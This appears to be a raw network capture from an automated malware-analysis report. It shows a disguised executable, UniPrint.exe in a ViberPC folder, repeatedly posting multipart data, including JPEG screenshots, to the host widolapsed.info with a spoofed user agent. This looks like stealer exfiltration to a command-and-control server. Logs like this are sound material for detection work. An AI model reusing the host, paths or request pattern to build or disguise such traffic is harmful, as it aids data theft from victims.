                                                                                                      2021-09-15 11:45:38 UTC1009OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:45:38 UTC1025OUTData Raw: d7 ff 00 02 1b ff 00 88 a0 0b 54 55 5f 33 50 ff 00 9f 5b 5f fc 08 6f fe 22 8f 33 50 ff 00 9f 5b 5f fc 08 6f fe 22 80 2d 51 55 7c cd 43 fe 7d 6d 7f f0 21 bf f8 8a 3c cd 43 fe 7d 6d 7f f0 21 bf f8 8a 00 b5 45 55 f3 35 0f f9 f5 b5 ff 00 c0 86 ff 00 e2 29 92 5c de 42 11 a6 b6 80 21 91 10 95 9c 92 37 30 5c e3 60 f5 a0 0b b4 51 45 00 15 e4 ff 00 15 bf e4 62 b6 ff 00 af 51 ff 00 a1 35 7a c5 79 3f c5 6f f9 18 ad bf eb d4 7f e8 4d 57 4f e2 22 7b 1c 50 a5 a4 a2 ba 8e 71 d4 52 52 d0 20 a2 8a 29 80 52 d2 51 40 0b 45 25 14 00 b4 52 52 d0 01 45 14 50 20 a2 8a 28 00 a5 a4 a2 98 0b 45 25 2d 00 2d 14 94 50 16 16 8a 4a 5a 00 28 a2 8a 62 16 8a 4a 28 01 69 69 29 69 a1 0b 45 25 2d 31 06 68 cd 25 2e 45 17 01 68 a4 cd 19 a2 e1 61 68 cd 25 02 80 b0 b9 a2 8a 28 00 a2 8a 28 10 b4
                                                                                                      Data Ascii: TU_3P[_o"3P[_o"-QU|C}m!<C}m!EU5)\B!70\`QEbQ5zy?oMWO"{PqRR )RQ@E%RREP (E%--PJZ(bJ(ii)iE%-1h%.Ehah%((
                                                                                                      2021-09-15 11:45:38 UTC1041OUTData Raw: d3 05 78 23 cc 4f f1 aa 57 76 77 16 52 88 ae a3 d8 e5 77 01 90 78 fc 3e 95 d1 ca d2 d8 d5 49 3e a4 15 6b 4e bf 9f 4d bc 5b ab 6d 9e 62 e7 1b 97 23 9f 6a 76 9f a5 5e ea 5e 67 d8 a0 f3 7c bc 6e f9 d4 63 39 c7 52 3d 0d 5d ff 00 84 5f 5b ff 00 9f 2f fc 8a 9f e3 4d 46 5b a4 4b 94 76 6c 98 f8 b7 53 3f f2 ce d3 fe fc 0a 69 f1 5e a4 7a 2d b0 3e a2 10 2a 3f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 34 7f c2 2f ad ff 00 cf 97 fe 45 4f f1 ab bd 5f 32 2d 4b c8 c7 62 59 8b 31 24 93 93 49 5b 3f f0 8b eb 5f f3 e5 ff 00 91 53 fc 6a 96 a1 a5 de e9 be 5f db 60 f2 bc cc ed f9 94 e7 18 cf 42 7d 45 43 8c 96 ad 1a 29 45 e8 99 4e 8a 28 a9 28 28 a2 8a 00 28 a2 8a 00 28 a2 8a 40 14 51 45 00 14 94 b4 94 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 0c 28 a2 8a 00
                                                                                                      Data Ascii: x#OWvwRwx>I>kNM[mb#jv^^g|nc9R=]_[/MF[KvlS?i^z->*?E4/EO_2-KbY1$I[?_Sj_`B}EC)EN(((((@QEQEQEQEQEQEQE(
                                                                                                      2021-09-15 11:45:38 UTC1042OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 33 33 35 37 33 32 35 36 32 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3335732562--
                                                                                                      2021-09-15 11:45:40 UTC1042INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:38 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=54f790c46c8dc0819b9f3be8ec19ea40856b9f1ee1cf970e5b4241b5eb21ec1e; expires=Thu, 15-Sep-2022 11:45:38 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:40 UTC1042INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.34977145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:41 UTC1042OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83052
                                                                                                      Content-Type: multipart/form-data; boundary=--------1291895716
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:41 UTC1042OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 39 31 38 39 35 37 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1291895716Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:41 UTC1042OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 94 bb 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:41 UTC1042OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:41 UTC1058OUTData Raw: 2d 29 bb a3 aa 9d 3c 3d 7b c6 0a cc f2 8a cf d6 7f e3 d1 3f eb a0 fe 46 ba 2f 10 d8 0d 3b 58 9a 04 18 8c fc e9 f4 3d bf 98 ae 77 59 ff 00 8f 44 ff 00 ae 83 f9 1a ec a9 25 2a 4e 4b aa 38 e9 c5 c6 b2 8b e8 cc 5a 28 a2 bc c3 d5 0a 28 a4 a0 0f 7a 96 00 ff 00 32 70 df ce a0 19 07 07 a8 ab 86 a9 b1 fd eb ff 00 bc 6b e5 ea 25 b9 eb c5 92 29 af 18 d7 bf e4 60 d4 bf eb ea 5f fd 0c d7 b3 29 af 19 d7 bf e4 60 d4 bf eb ea 5f fd 0c d7 a1 96 7c 52 39 71 7b 22 85 2d 25 2d 7b 27 10 51 8a 28 a0 41 8a f4 ff 00 85 3c 69 37 df f5 dc 7f e8 35 e6 15 e9 df 0a bf e4 13 7d ff 00 5d c7 fe 83 59 d5 f8 4d 29 fc 47 75 49 59 36 36 b0 3e 93 6d 73 73 3d d6 5a 05 92 47 37 72 81 f7 41 27 ef 55 94 b0 b5 92 35 78 e6 ba 65 61 90 45 e4 b8 23 fe fa ac 5c 62 9e ff 00 87 fc 13 45 29 35 b7 e3 ff
                                                                                                      Data Ascii: -)<={?F/;X=wYD%*NK8Z((z2pk%)`_)`_|R9q{"-%-{'Q(A<i75}]YM)GuIY66>mss=ZG7rA'U5xeaE#\bE)5
                                                                                                      2021-09-15 11:45:41 UTC1074OUTData Raw: 69 4d 00 2e 68 cf a5 36 97 06 80 1d 9a 4c d0 05 38 0a 04 20 14 e0 28 02 9d 41 2d 85 25 2e 28 c5 31 05 2d 25 2d 02 0a 72 d3 69 68 01 f4 53 69 c2 99 22 d1 49 4b 40 8b 3a 77 fc 7f 45 f5 a7 de 9f f4 d9 7f de a6 69 df f1 fd 17 d6 96 ec e6 ea 4f f7 ab 0f f9 7a 5b fe 19 15 25 14 56 a6 22 d1 49 4b 40 05 14 51 40 85 a2 92 96 90 05 14 51 40 82 96 92 96 90 05 2d 25 28 a0 42 8a 5a 4a 5a 42 16 ac 40 dd 05 56 a9 ad fe f5 44 b6 34 a4 ed 23 5f 56 38 f0 d0 f7 6a e2 5f ad 76 7a cf 1e 1a 4f f7 ab 8b 73 cd 63 85 f8 1f a9 ea 57 f8 d7 a1 de 8e 3c 3b 65 f4 15 47 35 75 b8 f0 fd 88 ff 00 64 7f 2a a3 5c f4 7a fa 9a 62 1f bc bd 05 cd 19 a4 a4 ad 8e 7b 8e cd 28 6a 68 a2 8b 02 63 f2 69 db 8f ad 30 52 d4 b4 5a 6c 90 31 a7 06 35 10 a7 66 a5 a2 94 99 28 73 eb 4e 13 30 e8 c6 a1 06 96 a5
                                                                                                      Data Ascii: iM.h6L8 (A-%.(1-%-rihSi"IK@:wEiOz[%V"IK@Q@Q@-%(BZJZB@VD4#_V8j_vzOscW<;eG5ud*\zb{(jhci0RZl15f(sN0
                                                                                                      2021-09-15 11:45:41 UTC1090OUTData Raw: 1d 9b 19 45 4e b6 93 b7 dd 8d bf 2a 9d 34 cb a6 ff 00 96 46 a1 d4 8a ea 52 a5 37 b2 29 51 5a 8b a3 4e 7e f1 55 fa 9a 78 d2 63 5e 64 b9 8c 7e 35 9b c4 43 b9 6b 0d 51 f4 32 78 a3 15 af f6 4d 36 3f f5 97 40 fd 28 f3 74 88 ff 00 bc f4 bd bf 64 ca 58 67 d5 a4 64 e2 9e 23 73 c0 52 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13
                                                                                                      Data Ascii: EN*4FR7)QZN~Uxc^d~5CkQ2xM6?@(tdXgd#sR:R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G
                                                                                                      2021-09-15 11:45:41 UTC1106OUTData Raw: f1 14 01 6a 8a ab e6 6a 1f f3 eb 6b ff 00 81 0d ff 00 c4 51 e6 6a 1f f3 eb 6b ff 00 81 0d ff 00 c4 50 05 aa 2a af 99 a8 7f cf ad af fe 04 37 ff 00 11 47 99 a8 7f cf ad af fe 04 37 ff 00 11 40 16 a8 aa be 66 a1 ff 00 3e b6 bf f8 10 df fc 45 1e 66 a1 ff 00 3e b6 bf f8 10 df fc 45 00 5a a2 aa f9 9a 87 fc fa da ff 00 e0 43 7f f1 14 79 9a 87 fc fa da ff 00 e0 43 7f f1 14 01 6a 8a ab e6 6a 1f f3 eb 6b ff 00 81 0d ff 00 c4 53 24 b9 bc 84 23 4d 6d 00 43 22 21 2b 39 24 6e 60 b9 c6 c1 eb 40 17 68 a2 8a 00 2b c9 fe 2b 7f c8 c5 6d ff 00 5e a3 ff 00 42 6a f5 8a f2 7f 8a df f2 31 5b 7f d7 a8 ff 00 d0 9a ae 9f c4 44 f6 38 a1 4b 49 45 75 1c e3 a8 a4 a5 a0 41 45 14 53 00 a5 a4 a2 80 16 8a 4a 28 01 68 a4 a5 a0 02 8a 28 a0 41 45 14 50 01 4b 49 45 30 16 8a 4a 5a 00 5a 29 28
                                                                                                      Data Ascii: jjkQjkP*7G7@f>Ef>EZCyCjjkS$#MmC"!+9$n`@h++m^Bj1[D8KIEuAESJ(h(AEPKIE0JZZ)(
                                                                                                      2021-09-15 11:45:41 UTC1122OUTData Raw: 00 c2 2d ad ff 00 cf 97 fe 45 4f f1 a7 c9 26 b6 33 93 83 5c b2 66 f5 86 b1 04 8e be 45 e8 81 9f 82 59 f6 63 eb 5b 1a 9f 8b 34 dd 2e c4 c5 63 32 dd dc 81 85 0a 72 33 ea 4d 71 3f f0 8b 6b 7f f3 e5 ff 00 91 53 fc 68 ff 00 84 5b 5b ff 00 9f 2f fc 8a 9f e3 5c f5 70 5e d5 ae 6b d9 74 27 0d c9 87 bf 2b dc cb 9e 69 2e 27 92 79 9b 74 92 31 66 3e a4 d4 75 a8 de 1e d5 95 99 4d a6 0a f0 47 98 9f e3 54 ae ec ee 2c a5 11 5d 47 b1 ca ee 03 20 f1 f8 7d 2b a3 95 a5 b1 aa 92 7d 48 2a d6 9d 7f 3e 9b 78 b7 56 db 3c c5 ce 37 2e 47 3e d4 ed 3f 4a bd d4 bc cf b1 41 e6 f9 78 dd f3 a8 c6 73 8e a4 7a 1a bb ff 00 08 be b7 ff 00 3e 5f f9 15 3f c6 9a 8c b7 48 97 28 ec d9 31 f1 6e a6 7f e5 9d a7 fd f8 14 d3 e2 bd 48 f4 5b 60 7d 44 20 54 7f f0 8b eb 5f f3 e5 ff 00 91 53 fc 68 ff 00 84
                                                                                                      Data Ascii: -EO&3\fEYc[4.c2r3Mq?kSh[[/\p^kt'+i.'yt1f>uMGT,]G }+}H*>xV<7.G>?JAxsz>_?H(1nH[`}D T_Sh
                                                                                                      2021-09-15 11:45:41 UTC1123OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 39 31 38 39 35 37 31 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1291895716--
                                                                                                      2021-09-15 11:45:42 UTC1123INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:41 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=74da0ed575cf66f14583ff16cd489bc68a83938351dc5ccad80348da77c67836; expires=Thu, 15-Sep-2022 11:45:41 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:42 UTC1124INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.34977845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:42 UTC1124OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76682
                                                                                                      Content-Type: multipart/form-data; boundary=--------1315708494
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:42 UTC1124OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 31 35 37 30 38 34 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1315708494Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:42 UTC1124OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b6 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:42 UTC1124OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:42 UTC1140OUTData Raw: 33 f3 a7 d0 f6 fe 62 b9 dd 67 fe 3d 13 fe ba 0f e4 6b b2 a4 94 a9 39 2e a8 e3 a7 17 1a ca 2f a3 31 68 a2 8a f3 0f 54 28 a2 92 80 3d ea 58 03 fc c9 c3 7f 3a 80 64 1c 1e a2 ae 1a a6 c7 f7 af fe f1 af 97 a8 96 e7 af 16 48 a6 bc 63 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e cc a6 bc 67 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e 86 59 f1 48 e5 c5 ec 8a 14 b4 94 b5 ec 9c 41 46 28 a2 81 06 2b d3 fe 14 f1 a4 df 7f d7 71 ff 00 a0 d7 98 57 a7 7c 2a ff 00 90 4d f7 fd 77 1f fa 0d 67 57 e1 34 a7 f1 1d d5 25 64 d8 da c0 fa 4d b5 cd cc f7 59 68 16 49 1c dd ca 07 dd 04 9f bd 56 52 c2 d6 48 d5 e3 9a e9 95 86 41 17 92 e0 8f fb ea b1 71 8a 7b fe 1f f0 4d 14 a4 d6 df 8f fc 02 a6 a9 05 ad da 5d 5a 5e c1 24 91 ca c0 f1 13 37 f0 a8 c8 20 75 e2 bc 87 5f d2 ff 00 b2 35 47 b5 0e 5d
                                                                                                      Data Ascii: 3bg=k9./1hT(=X:dHc^R3^g^R3^YHAF(+qW|*MwgW4%dMYhIVRHAq{M]Z^$7 u_5G]
                                                                                                      2021-09-15 11:45:42 UTC1156OUTData Raw: 80 a0 0a 75 04 b6 14 94 b8 a3 14 c4 14 b4 94 b4 08 29 cb 4d a5 a0 07 d1 4d a7 0a 64 8b 45 25 2d 02 2c e9 df f1 fd 17 d6 9f 7a 7f d3 65 ff 00 7a 99 a7 7f c7 f4 5f 5a 5b b3 9b a9 3f de ac 3f e5 e9 6f f8 64 54 94 51 5a 98 8b 45 25 2d 00 14 51 45 02 16 8a 4a 5a 40 14 51 45 02 0a 5a 4a 5a 40 14 b4 94 a2 81 0a 29 69 29 69 08 5a b1 03 74 15 5a a6 b7 fb d5 12 d8 d2 93 b4 8d 7d 58 e3 c3 43 dd ab 89 7e b5 d9 eb 3c 78 69 3f de ae 2d cf 35 8e 17 e0 7e a7 a9 5f e3 5e 87 7a 38 f0 ed 97 d0 55 1c d5 d6 e3 c3 f6 23 fd 91 fc aa 8d 73 d1 eb ea 69 88 7e f2 f4 17 34 66 92 92 b6 39 ee 3b 34 a1 a9 a2 8a 2c 09 8f c9 a7 6e 3e b4 c1 4b 52 d1 69 b2 40 c6 9c 18 d4 42 9d 9a 96 8a 52 64 a1 cf ad 38 4c c3 a3 1a 84 1a 5a 97 14 5a 9b 2d 2d cc 83 f8 8d 4a b7 8e 3a e0 d5 20 69 d9 a8 74 e2
                                                                                                      Data Ascii: u)MMdE%-,zez_Z[??odTQZE%-QEJZ@QEZJZ@)i)iZtZ}XC~<xi?-5~_^z8U#si~4f9;4,n>KRi@BRd8LZZ--J: it
                                                                                                      2021-09-15 11:45:42 UTC1172OUTData Raw: ea 69 e3 49 8d 79 92 e6 31 f8 d6 6f 11 0e e5 ac 35 47 d0 c9 e2 8c 56 bf d9 34 d8 ff 00 d6 5d 03 f4 a3 cd d2 23 fe f3 d2 f6 fd 93 29 61 9f 56 91 93 8a 78 8d cf 01 49 fc 2b 44 ea 5a 7c 7f ea ed 49 fa d2 1d 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48 48 bd 5c 1f e1 ac 5e bd eb 0a 14 39 a0 9b 64 e2 71 9c 95 1c 54 4e 80 ea 7a 7a 7d c8 89 a6 1d 72 25 ff 00 57 6e 2b 0a 8a dd 61 61 d4 e4 78 fa bd 0d 86 d7 e6 fe 08 d4 54 0f ac
                                                                                                      Data Ascii: iIy1o5GV4]#)aVxI+DZ|Ip/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUHH\^9dqTNzz}r%Wn+aaxT
                                                                                                      2021-09-15 11:45:42 UTC1188OUTData Raw: 0c 75 14 94 b4 c4 55 a5 a2 8a c4 d8 28 a2 8a 00 28 a2 8a 00 28 a2 92 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a6 02 d1 49 45 00 2d 25 2d 14 00 94 51 45 00 14 51 45 00 2d 14 94 50 02 d2 d3 69 68 10 b4 94 51 40 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd e8 a2 8a 00 28 a4 a5 a6 02 d1 49 45 02 16 8a 4a 5a 00 5a 29 28 a6 21 68 a2 8a 00 5a 4a 33 45 00 2d 14 51 40 05 2d 25 14 00 b4 0a 4a 5a 62 16 8c d2 51 4c 42 e6 8c d2 51 40 0e
                                                                                                      Data Ascii: uU((((((IE-%-QEQE-PihQ@)(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%(IEJZZ)(!hZJ3E-Q@-%JZbQLBQ@
                                                                                                      2021-09-15 11:45:42 UTC1199OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 31 35 37 30 38 34 39 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1315708494--
                                                                                                      2021-09-15 11:45:45 UTC1199INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:42 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=b43afc0eb707f8b68fa0a36d475eea243f65ba7380961676812b4c94a71a640c; expires=Thu, 15-Sep-2022 11:45:43 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:45 UTC1199INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.34978945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
